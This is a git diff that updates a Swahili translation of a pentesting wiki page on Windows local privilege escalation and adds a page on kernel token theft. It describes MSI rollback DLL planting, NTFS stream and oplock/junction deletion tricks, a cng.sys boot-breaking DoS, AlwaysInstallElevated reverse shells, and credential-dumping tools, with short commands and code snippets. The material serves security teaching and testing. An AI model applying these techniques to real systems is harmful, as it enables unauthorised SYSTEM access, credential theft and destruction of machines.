-- Kisha **toa ishara nyuma** ili kuondoa iweze kumalizika. -- Windows Installer inashindwa kuondoa `.rbf`, na kwa sababu haiwezi kuondoa maudhui yote, **`C:\Config.Msi` haiondolewa**. +- Step 4: Block Deletion of `.rbf` +- Ukitangazwa, **fungua faili `.rbf`** bila `FILE_SHARE_DELETE` — hili **linazuia kufutwa kwake**. +- Kisha **tuma ishara tena** ili uninstall iendelee. +- Windows Installer inashindwa kufuta `.rbf`, na kwa sababu hawezi kufuta yaliyomo yote, **`C:\Config.Msi` haifutwi**. -- Hatua ya 5: Ondoa `.rbf` kwa Mikono -- Wewe (mshambuliaji) unafuta faili ya `.rbf` kwa mikono. -- Sasa **`C:\Config.Msi` ni tupu**, tayari kuingiliwa. +- Step 5: Manually Delete `.rbf` +- Wewe (mshambuliaji) unafuta `.rbf` kwa mikono. +- Sasa **`C:\Config.Msi` iko tupu**, tayari ku-hijackiwa. -> Katika hatua hii, **sababisha udhaifu wa kuondoa folda ya kichaguliwa kwa kiwango cha SYSTEM** ili kufuta `C:\Config.Msi`. +> Wakati huu, **anzisha udhaifu wa kufuta folda kwa ngazi ya SYSTEM** ili kufuta `C:\Config.Msi`. -2. **Hatua ya 2 – Kubadilisha Skripti za Kurejesha na za Uhalifu** +2. **Stage 2 – Kubadilisha Rollback Scripts na Zenye Madhara** -- Hatua ya 6: Recreate `C:\Config.Msi` na ACL dhaifu -- Recreate folda ya `C:\Config.Msi` mwenyewe. -- Weka **DACL dhaifu** (mfano, Everyone:F), na **hifadhi handle wazi** na `WRITE_DAC`. +- Step 6: Recreate `C:\Config.Msi` with Weak ACLs +- Unda tena folda `C:\Config.Msi` mwenyewe. +- Weka **DACLs dhaifu** (mfano, Everyone:F), na **weka handle wazi** ukiwa na `WRITE_DAC`. -- Hatua ya 7: Kimbia Sakinisha Nyingine -- Sakinisha `.msi` tena, na: -- `TARGETDIR`: Mahali pa kuandika. -- `ERROROUT`: Kigezo kinachosababisha kushindwa kwa lazima. -- Sakinisho hili litatumika kusababisha **kurejesha** tena, ambayo inasoma `.rbs` na `.rbf`. +- Step 7: Run Another Install +- Install `.msi` tena, na: +- `TARGETDIR`: Mahali panapoandikwa. +- `ERROROUT`: Kigezo kinachosababisha kushindwa kwa kupata kosa. 
+- Install hii itatumika kusababisha **rollback** tena, ambayo inasoma `.rbs` na `.rbf`. -- Hatua ya 8: Fuata kwa `.rbs` -- Tumia `ReadDirectoryChangesW` kufuatilia `C:\Config.Msi` hadi `.rbs` mpya inatokea. -- Pata jina lake la faili. +- Step 8: Monitor for `.rbs` +- Tumia `ReadDirectoryChangesW` kufuatilia `C:\Config.Msi` hadi `.rbs` mpya itaonekana. +- Rekodi jina lake. -- Hatua ya 9: Usawazisha Kabla ya Kurejesha -- `.msi` ina **kitendo cha usakinishaji cha kawaida (`SyncBeforeRollback`)** ambacho: -- Kinatoa ishara ya tukio wakati `.rbs` inaundwa. +- Step 9: Sync Before Rollback +- `.msi` ina **custom install action (`SyncBeforeRollback`)** ambayo: +- Inatuma ishara (signals) wakati `.rbs` imetengenezwa. - Kisha **inasubiri** kabla ya kuendelea. -- Hatua ya 10: Rudisha ACL dhaifu +- Step 10: Reapply Weak ACL - Baada ya kupokea tukio la `.rbs created`: - Windows Installer **inarudisha ACL kali** kwa `C:\Config.Msi`. -- Lakini kwa sababu bado una handle na `WRITE_DAC`, unaweza **kurudisha ACL dhaifu** tena. +- Lakini kwa kuwa bado una handle yenye `WRITE_DAC`, unaweza **kurejesha ACL dhaifu** tena. -> ACL zina **imarishwa tu wakati handle imefunguliwa**, hivyo unaweza bado kuandika kwenye folda. +> ACLs zinafanywa tu wakati handle inafunguliwa, hivyo bado unaweza kuandika kwenye folda. -- Hatua ya 11: Angusha `.rbs` bandia na `.rbf` -- Badilisha faili ya `.rbs` na **skripti ya kurejesha bandia** inayosema kwa Windows: -- Rejesha faili yako ya `.rbf` (DLL mbaya) katika **mahali pa kipaumbele** (mfano, `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`). -- Angusha `.rbf` yako bandia yenye **mzigo mbaya wa DLL wa kiwango cha SYSTEM**. +- Step 11: Drop Fake `.rbs` and `.rbf` +- Andika upya faili `.rbs` na script bandia ya rollback ambayo inaelekeza Windows: +- Kuirejesha `.rbf` yako (DLL yenye madhara) katika **mahali lenye ruhusa za juu** (mfano, `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`). 
+- Weka `.rbf` bandia inaobeba **DLL yenye payload ya SYSTEM**. -- Hatua ya 12: Sababisha Kurejesha -- Toa ishara ya tukio la usawazishaji ili msanidi arudi. -- **Kitendo cha kawaida cha aina 19 (`ErrorOut`)** kimewekwa ili **kushindwa kwa kusudi kwa usakinishaji** katika sehemu inayojulikana. -- Hii inasababisha **kurejesha kuanza**. +- Step 12: Trigger the Rollback +- Tuma ishara ya sync ili installer iendelee. +- Custom action ya aina 19 (`ErrorOut`) imesanidiwa kushindwa kwa hiari katika hatua inayojulikana. +- Hii inasababisha **rollback kuanza**. -- Hatua ya 13: SYSTEM Inasakinisha DLL Yako +- Step 13: SYSTEM Installs Your DLL - Windows Installer: -- Inasoma `.rbs` yako mbaya. -- Inakopya DLL yako ya `.rbf` katika mahali pa lengo. -- Sasa una **DLL yako mbaya katika njia iliyo loaded na SYSTEM**. +- Inasoma `.rbs` yako yenye madhara. +- Inakopa DLL yako ya `.rbf` hadi mahali lengwa. +- Sasa una **DLL yako yenye madhara katika njia inayopakiwa na SYSTEM**. -- Hatua ya Mwisho: Teua Msimbo wa SYSTEM -- Kimbia **binary ya kujiinua yenye kuaminika** (mfano, `osk.exe`) inayopakia DLL uliyoiingilia. -- **Boom**: Msimbo wako unatekelezwa **kama SYSTEM**. +- Final Step: Execute SYSTEM Code +- Endesha binary ya kuaminika yenye auto-elevation (mfano, `osk.exe`) ambayo inapakia DLL uliyohijack. +- **Boom**: Code yako inatekelezwa **kwa SYSTEM**. -### Kutoka kwa Kuondoa/Kuhamasisha/Kubadilisha Faili ya Kichaguliwa hadi SYSTEM EoP +### Kutoka Arbitrary File Delete/Move/Rename hadi SYSTEM EoP -Tekniki kuu ya kurejesha MSI (ile ya awali) inadhani unaweza kufuta **folda nzima** (mfano, `C:\Config.Msi`). Lakini je, ni vipi ikiwa udhaifu wako unaruhusu tu **kuondoa faili za kichaguliwa**? +Mbinu kuu ya rollback ya MSI (iliyotangulia) inadhani unaweza kufuta **folda nzima** (mfano, `C:\Config.Msi`). Lakini vipi ikiwa udhaifu wako unaruhusu tu **ufutaji wa faili yoyote**? 
-Unaweza kutumia **NTFS internals**: kila folda ina mtiririko wa data mbadala uliofichwa unaoitwa: +Unaweza kutekeleza exploit kwa kutumia **NDANI za NTFS**: kila folda ina alternate data stream iliyofichwa inayoitwa: ``` C:\SomeFolder::$INDEX_ALLOCATION ``` -Hii stream inahifadhi **metadata ya index** ya folda. +Mtiririko huu unahifadhi **index metadata** ya folda. -Hivyo, ikiwa **unafuta stream ya `::$INDEX_ALLOCATION`** ya folda, NTFS **inaondoa folda nzima** kutoka kwa mfumo wa faili. +Kwa hivyo, ikiwa utafuta **mtiririko wa `::$INDEX_ALLOCATION`** wa folda, NTFS **itaondoa folda nzima** kutoka kwenye mfumo wa faili. -Unaweza kufanya hivi kwa kutumia APIs za kawaida za kufuta faili kama: +Unaweza kufanya hivyo kwa kutumia APIs za kawaida za kufuta faili kama: ```c DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION"); ``` -> Ingawa unaita *file* delete API, in **afuta folda yenyewe**. +> Ingawa ukiita *file* delete API, **inafuta folda yenyewe**. -### Kutoka kwa Kufuta Maudhui ya Folda hadi SYSTEM EoP -Je, ni nini kitatokea ikiwa primitive yako haitakuruhusu kufuta faili/folda za kawaida, lakini **inaruhusu kufutwa kwa *maudhui* ya folda inayodhibitiwa na mshambuliaji**? +### Kutoka Kuifuta Yaliyomo Kwenye Folda hadi SYSTEM EoP +Je, vipi ikiwa primitive yako haikuwezesha kufuta arbitrary files/folders, lakini **inawezesha deletion ya *contents* ya attacker-controlled folder**? -1. Hatua ya 1: Weka folda na faili ya mtego -- Unda: `C:\temp\folder1` -- Ndani yake: `C:\temp\folder1\file1.txt` +1. Hatua 1: Tengeneza folda ya mtego na file +- Create: `C:\temp\folder1` +- Inside it: `C:\temp\folder1\file1.txt` -2. Hatua ya 2: Weka **oplock** kwenye `file1.txt` -- Oplock **inasimamisha utekelezaji** wakati mchakato wenye mamlaka unajaribu kufuta `file1.txt`. +2. Hatua 2: Weka an **oplock** kwenye `file1.txt` +- Oplock hiyo **inasimamisha utekelezaji** wakati privileged process inapo jaribu kufuta `file1.txt`. 
```c // pseudo-code RequestOplock("C:\\temp\\folder1\\file1.txt"); WaitForDeleteToTriggerOplock(); ``` -3. Hatua ya 3: Trigger mchakato wa SYSTEM (kwa mfano, `SilentCleanup`) -- Mchakato huu unachunguza folda (kwa mfano, `%TEMP%`) na kujaribu kufuta maudhui yao. -- Wakati inafikia `file1.txt`, **oplock inasababisha** na inachukua udhibiti kwa callback yako. +3. Hatua 3: Chochea mchakato wa SYSTEM (kwa mfano, `SilentCleanup`) +- Mchakato huu unachanganua folda (kwa mfano, `%TEMP%`) na kujaribu kufuta yaliyomo ndani yake. +- Wakati inafika `file1.txt`, **oplock triggers** na inampatia callback yako udhibiti. -4. Hatua ya 4: Ndani ya callback ya oplock – elekeza ufutaji +4. Hatua 4: Ndani ya oplock callback – elekeza upya ufutaji - Chaguo A: Hamisha `file1.txt` mahali pengine - Hii inafanya `folder1` kuwa tupu bila kuvunja oplock. 
@@ -1479,76 +1492,76 @@ mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control # Make file1.txt point to a sensitive folder stream CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION") ``` -> Hii inalenga mtiririko wa ndani wa NTFS ambao huhifadhi metadata ya folda — kuifuta kunafuta folda. +> Hii inalenga stream ya ndani ya NTFS inayohifadhi metadata ya folda — kuifuta kwake kunafuta folda. -5. Hatua ya 5: Achilia oplock -- Mchakato wa SYSTEM unaendelea na kujaribu kufuta `file1.txt`. -- Lakini sasa, kutokana na junction + symlink, inafuta kweli: +5. Hatua 5: Kuachilia oplock +- Mchakato wa SYSTEM unaendelea na unajaribu kufuta `file1.txt`. +- Lakini sasa, kutokana na junction + symlink, kwa kweli inafuta: ``` C:\Config.Msi::$INDEX_ALLOCATION ``` **Matokeo**: `C:\Config.Msi` imefutwa na SYSTEM. -### Kutoka Kwenye Folda Isiyo na Mpangilio Kuunda DoS ya Kudumu +### Kutoka Kuunda Folda ya Nasibu hadi DoS ya Kudumu -Tumia udhaifu ambao unakuwezesha **kuunda folda isiyo na mpangilio kama SYSTEM/admin** — hata kama **huwezi kuandika faili** au **kweka ruhusa dhaifu**. +Exploit a primitive that lets you **kuunda folda yoyote kama SYSTEM/admin** — hata kama **huwezi kuandika faili** au **kuweka ruhusa dhaifu**. -Unda **folda** (sio faili) yenye jina la **dereva muhimu wa Windows**, e.g.: +Unda **folda** (si faili) yenye jina la **critical Windows driver**, e.g.: ``` C:\Windows\System32\cng.sys ``` -- Hii njia kawaida inahusiana na dereva wa `cng.sys` wa hali ya kernel. -- Ikiwa **utaunda kabla kama folda**, Windows inashindwa kupakia dereva halisi wakati wa kuanzisha. -- Kisha, Windows inajaribu kupakia `cng.sys` wakati wa kuanzisha. -- Inaona folda, **inashindwa kutatua dereva halisi**, na **inashindwa au kusimamisha kuanzisha**. -- Hakuna **kurejea**, na **hakuna urejeleaji** bila uingiliaji wa nje (mfano, ukarabati wa kuanzisha au ufikiaji wa diski). +- Njia hii kawaida inalingana na `cng.sys` kernel-mode driver. 
+- Ikiwa **uiundia awali kama folda**, Windows itashindwa kupakia driver halisi wakati wa boot. +- Kisha, Windows inajaribu kupakia `cng.sys` wakati wa boot. +- Inaona folda, **inashindwa kutatua driver halisi**, na **inaanguka au kusitisha boot**. +- Hakuna **mbadala**, na hakuna **urejeshaji** bila uingiliaji wa nje (mf., ukarabati wa boot au upatikanaji wa diski). -## **Kutoka kwa Uaminifu wa Juu hadi Mfumo** +## **Kutoka High Integrity hadi SYSTEM** -### **Huduma Mpya** +### **Huduma mpya** -Ikiwa tayari unafanya kazi kwenye mchakato wa Uaminifu wa Juu, **njia ya SYSTEM** inaweza kuwa rahisi tu **kwa kuunda na kutekeleza huduma mpya**: +Ikiwa tayari unafanya kazi kwenye mchakato wa High Integrity, **njia hadi SYSTEM** inaweza kuwa rahisi kwa **kuunda na kutekeleza service mpya**: ``` sc create newservicename binPath= "C:\windows\system32\notepad.exe" sc start newservicename ``` > [!TIP] -> Wakati wa kuunda binary ya huduma hakikisha ni huduma halali au kwamba binary inatekeleza vitendo muhimu haraka kwani itauawa ndani ya sekunde 20 ikiwa si huduma halali. +> Wakati wa kuunda service binary hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka kwani itauawa ndani ya sekunde 20 ikiwa sio service halali. 
### AlwaysInstallElevated -Kutoka kwa mchakato wa High Integrity unaweza kujaribu **kuwezesha funguo za rejista za AlwaysInstallElevated** na **kufunga** shell ya kurudi kwa kutumia _**.msi**_ wrapper.\ -[Taarifa zaidi kuhusu funguo za rejista zinazohusika na jinsi ya kufunga pakiti ya _.msi_ hapa.](#alwaysinstallelevated) +Kutoka kwenye High Integrity process unaweza kujaribu **kuwasha AlwaysInstallElevated registry entries** na **kusakinisha** reverse shell ukitumia wrapper ya _**.msi**_.\ +[Taarifa zaidi kuhusu registry keys zinazohusika na jinsi ya kusakinisha kifurushi _.msi_ hapa.](#alwaysinstallelevated) -### High + SeImpersonate ruhusa kwa System +### High + SeImpersonate privilege to System -**Unaweza** [**kupata msimbo hapa**](seimpersonate-from-high-to-system.md)**.** +**Unaweza** [**kupata code hapa**](seimpersonate-from-high-to-system.md)**.** -### Kutoka SeDebug + SeImpersonate hadi Full Token ruhusa +### From SeDebug + SeImpersonate to Full Token privileges -Ikiwa una hizo ruhusa za tokeni (labda utaweza kuzipata katika mchakato wa High Integrity), utaweza **kufungua karibu mchakato wowote** (sio michakato iliyo na ulinzi) kwa ruhusa ya SeDebug, **kunakili tokeni** ya mchakato, na kuunda **mchakato wowote na tokeni hiyo**.\ -Kutumia mbinu hii kawaida **huchaguliwa mchakato wowote unaotembea kama SYSTEM na ruhusa zote za tokeni** (_ndiyo, unaweza kupata michakato ya SYSTEM bila ruhusa zote za tokeni_).\ -**Unaweza kupata** [**mfano wa msimbo unaotekeleza mbinu iliyopendekezwa hapa**](sedebug-+-seimpersonate-copy-token.md)**.** +Ikiwa una privileges hizo za token (kwa kawaida utazipata ndani ya mchakato uliopo tayari kuwa High Integrity), utaweza **kufungua karibu mchakato wowote** (sio protected processes) kwa kutumia SeDebug privilege, **kunakili token** ya mchakato, na kuunda **mchakato wowote unaotumia token hiyo**.\ +Kutumia mbinu hii kwa kawaida **huchagua mchakato wowote unaokimbia kama SYSTEM mwenye privileges zote za token** (_ndio, unaweza 
kupata SYSTEM processes bila privileges zote za token_).\ +**Unaweza kupata** [**mfano wa code unaotekeleza mbinu iliyopendekezwa hapa**](sedebug-+-seimpersonate-copy-token.md)**.** ### **Named Pipes** -Mbinu hii inatumika na meterpreter ili kupandisha hadhi katika `getsystem`. Mbinu hii inajumuisha **kuunda bomba na kisha kuunda/kutumia huduma kuandika kwenye bomba hilo**. Kisha, **server** iliyounda bomba hilo kwa kutumia ruhusa ya **`SeImpersonate`** itakuwa na uwezo wa **kujifanya kama tokeni** ya mteja wa bomba (huduma) ikipata ruhusa za SYSTEM.\ -Ikiwa unataka [**kujifunza zaidi kuhusu bomba za jina unapaswa kusoma hii**](#named-pipe-client-impersonation).\ -Ikiwa unataka kusoma mfano wa [**jinsi ya kutoka kwa high integrity hadi System kwa kutumia bomba za jina unapaswa kusoma hii**](from-high-integrity-to-system-with-name-pipes.md). +Mbinu hii inatumiwa na meterpreter kupanda hadhi katika `getsystem`. Mbinu inajumuisha **kuunda pipe na kisha kuunda/kuabusi service ili kuandika kwenye pipe hiyo**. Kisha, **server** iliyounda pipe kwa kutumia privilege ya **`SeImpersonate`** itakuwa na uwezo wa **kuiga token** ya mteja wa pipe (service) na kupata privileges za SYSTEM.\ +Ikiwa unataka [**kujifunza zaidi kuhusu name pipes unasome hii**](#named-pipe-client-impersonation).\ +Ikiwa unataka kusoma mfano wa [**jinsi ya kutoka high integrity hadi System ukitumia name pipes soma hii**](from-high-integrity-to-system-with-name-pipes.md). ### Dll Hijacking -Ikiwa unafanikiwa **kudhibiti dll** inayopakiwa na **mchakato** unaotembea kama **SYSTEM** utaweza kutekeleza msimbo wowote na ruhusa hizo. Hivyo basi Dll Hijacking pia ni muhimu kwa aina hii ya kupandisha hadhi, na zaidi, ikiwa ni **rahisi zaidi kufikia kutoka kwa mchakato wa high integrity** kwani itakuwa na **ruhusa za kuandika** kwenye folda zinazotumika kupakia dlls.\ +Ikiwa utafanikiwa **hijack a dll** inayopakiwa na **mchakato** unaokimbia kama **SYSTEM** utaweza kutekeleza code yoyote kwa idhini hizo. 
Kwa hivyo Dll Hijacking pia ni muhimu kwa aina hii ya kupandisha hadhi, na, zaidi ya hayo, ni **rahisi zaidi kufikiwa kutoka kwenye High Integrity process** kwani itakuwa na **write permissions** kwenye folders zinazotumika kupakia dlls.\ **Unaweza** [**kujifunza zaidi kuhusu Dll hijacking hapa**](dll-hijacking/index.html)**.** -### **Kutoka kwa Administrator au Network Service hadi System** +### **From Administrator or Network Service to System** - [https://github.com/sailay1996/RpcSsImpersonator](https://github.com/sailay1996/RpcSsImpersonator) - [https://decoder.cloud/2020/05/04/from-network-service-to-system/](https://decoder.cloud/2020/05/04/from-network-service-to-system/) - [https://github.com/decoder-it/NetworkServiceExploit](https://github.com/decoder-it/NetworkServiceExploit) -### Kutoka kwa LOCAL SERVICE au NETWORK SERVICE hadi ruhusa kamili +### From LOCAL SERVICE or NETWORK SERVICE to full privs **Soma:** [**https://github.com/itm4n/FullPowers**](https://github.com/itm4n/FullPowers) 
@@ -1558,45 +1571,45 @@ Ikiwa unafanikiwa **kudhibiti dll** inayopakiwa na **mchakato** unaotembea kama ## Zana muhimu -**Zana bora ya kutafuta mwelekeo wa kupandisha hadhi ya ndani ya Windows:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) +**Zana bora za kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) **PS** [**PrivescCheck**](https://github.com/itm4n/PrivescCheck)\ -[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- Angalia makosa ya usanidi na faili nyeti (**[**angalia hapa**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). Imegundulika.**\ -[**JAWS**](https://github.com/411Hall/JAWS) **-- Angalia makosa kadhaa ya usanidi na kukusanya taarifa (**[**angalia hapa**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\ -[**privesc** ](https://github.com/enjoiz/Privesc)**-- Angalia makosa ya usanidi**\ -[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- Inatoa taarifa za kikao zilizohifadhiwa za PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP. Tumia -Thorough katika eneo la ndani.**\ -[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Inatoa akidi kutoka kwa Meneja wa Akidi. 
Imegundulika.**\ -[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- Piga maneno ya siri yaliyokusanywa kwenye kikoa**\ -[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- Inveigh ni zana ya PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na man-in-the-middle.**\ -[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- Uainishaji wa msingi wa privesc Windows**\ -[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- Tafuta udhaifu wa privesc uliojulikana (IMEFUTWA kwa Watson)\ -[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- Ukaguzi wa ndani **(Inahitaji haki za Admin)** +[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- Angalia misconfigurations na faili nyeti (**[**angalia hapa**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). Imegunduliwa.**\ +[**JAWS**](https://github.com/411Hall/JAWS) **-- Angalia baadhi ya misconfigurations na kukusanya taarifa (**[**angalia hapa**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\ +[**privesc** ](https://github.com/enjoiz/Privesc)**-- Angalia misconfigurations**\ +[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- Hutoa taarifa za vikao vilivyohifadhiwa vya PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP. Tumia -Thorough kwa lokaal.**\ +[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Hutoa credentials kutoka Credential Manager. 
Imegunduliwa.**\ +[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- Fanya spray ya nywila zilizokusanywa kwenye domain**\ +[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- Inveigh ni PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na zana ya man-in-the-middle.**\ +[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- Orodhesha kwa msingi kwa ajili ya privesc Windows**\ +[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- Tafuta privesc vulnerabilities zinazojuikana (IMEACHWA kwa Watson)\ +[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- Ukaguzi wa lokal **(Inahitaji haki za Admin)** **Exe** -[**Watson**](https://github.com/rasta-mouse/Watson) -- Tafuta udhaifu wa privesc uliojulikana (inahitaji kukusanywa kwa kutumia VisualStudio) ([**imekusanywa mapema**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\ -[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Inatafuta mwenyeji akitafuta makosa ya usanidi (zaidi ni zana ya kukusanya taarifa kuliko privesc) (inahitaji kukusanywa) **(**[**imekusanywa mapema**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\ -[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Inatoa akidi kutoka kwa programu nyingi (exe iliyokusanywa mapema katika github)**\ +[**Watson**](https://github.com/rasta-mouse/Watson) -- Tafuta privesc vulnerabilities zinazojuikana (inahitaji kujengwa kwa kutumia VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\ +[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Orodhesha host akitafuta misconfigurations (zaidi ni zana ya kukusanya taarifa kuliko privesc) (inahitaji kujengwa) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\ +[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Hutoa credentials kutoka programu nyingi (exe imeprecompiled 
kwenye github)**\ [**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port ya PowerUp kwa C#**\ -[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Angalia makosa ya usanidi (executable iliyokusanywa katika github). Haipendekezwi. Haifanyi kazi vizuri katika Win10.\ -[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Angalia makosa yanayoweza kutokea (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri katika Win10. +[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Angalia misconfiguration (executable precompiled kwenye github). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.\ +[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Angalia misconfigurations zinazowezekana (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10. **Bat** -[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Zana iliyoundwa kwa msingi wa chapisho hili (haitaji accesschk kufanya kazi vizuri lakini inaweza kuitumia). +[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Zana iliyotengenezwa kulingana na chapisho hili (haihitaji accesschk ili ifanye kazi vizuri lakini inaweza kuitumia). 
**Local** -[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- Inasoma matokeo ya **systeminfo** na inapendekeza exploits zinazofanya kazi (python ya ndani)\ -[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- Inasoma matokeo ya **systeminfo** na inapendekeza exploits zinazofanya kazi (python ya ndani) +[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- Inasoma output ya **systeminfo** na inapendekeza exploits zinazofanya kazi (python ya lokal)\ +[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- Inasoma output ya **systeminfo** na inapendekeza exploits zinazofanya kazi (python ya lokal) **Meterpreter** _multi/recon/local_exploit_suggestor_ -Lazima uunde mradi kwa kutumia toleo sahihi la .NET ([ona hii](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). Ili kuona toleo lililosakinishwa la .NET kwenye mwenyeji wa mwathirika unaweza kufanya: +Lazima ujenge project kwa kutumia toleo sahihi la .NET ([angalia hili](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). Ili kuona toleo la .NET lililosanidiwa kwenye host ya mwathirika unaweza kufanya: ``` C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line ``` 
@@ -1617,4 +1630,6 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the - [http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html](http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html) - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections) +- [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html) + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md b/src/windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md new file mode 100644 index 000000000..4b5fbb453 --- /dev/null +++ b/src/windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md 
@@ -0,0 +1,122 @@ +# Windows kernel EoP: Token stealing with arbitrary kernel R/W + +{{#include ../../banners/hacktricks-training.md}} + +## Muhtasari + +Ikiwa driver dhaifu ina IOCTL inayomruhusu mshambuliaji primitives za arbitrary kernel read na/au write, kuinua haki hadi NT AUTHORITY\SYSTEM mara nyingi inaweza kufanikiwa kwa kuiba token ya SYSTEM. Mbinu hii inakopa pointer ya Token kutoka kwenye EPROCESS ya mchakato wa SYSTEM na kuiweka kwenye EPROCESS ya mchakato wako wa sasa. + +Kwa nini inafanya kazi: +- Kila mchakato una muundo wa EPROCESS ambao una (miongoni mwa sehemu nyingine) Token (kwa kweli EX_FAST_REF kuelekea kitu cha token). +- Mchakato wa SYSTEM (PID 4) una token yenye ruhusa zote zikiwa zimeteuliwa. +- Kubadilisha EPROCESS.Token ya mchakato wako wa sasa na pointer ya token ya SYSTEM hufanya mchakato wako uendelee kuendesha kama SYSTEM mara moja. + +> Offsets katika EPROCESS zinatofautiana kati ya matoleo ya Windows. Zidhibitio kwa njia ya dynamic (symbols) au tumia constants maalum kwa toleo. Pia kumbuka kuwa EPROCESS.Token ni EX_FAST_REF (bita 3 za chini ni flag za reference count). + +## Hatua za juu + +1) Pata base ya ntoskrnl.exe na tatua anwani ya PsInitialSystemProcess. +- Kutoka user mode, tumia NtQuerySystemInformation(SystemModuleInformation) au EnumDeviceDrivers kupata base za drivers zilizo load. +- Ongeza offset ya PsInitialSystemProcess (kutoka symbols/reversing) kwenye kernel base kupata anwani yake. +2) Soma pointer kwenye PsInitialSystemProcess → hii ni kernel pointer kuelekea EPROCESS ya SYSTEM. +3) Kutoka EPROCESS ya SYSTEM, soma UniqueProcessId na ActiveProcessLinks offsets ili kuvuka orodha ya double linked list ya miundo ya EPROCESS (ActiveProcessLinks.Flink/Blink) hadi utakapopata EPROCESS ambayo UniqueProcessId yake ni sawa na GetCurrentProcessId(). Hifadhi yote: +- EPROCESS_SYSTEM (kwa SYSTEM) +- EPROCESS_SELF (kwa mchakato wa sasa) +4) Soma thamani ya token ya SYSTEM: Token_SYS = *(EPROCESS_SYSTEM + TokenOffset). 
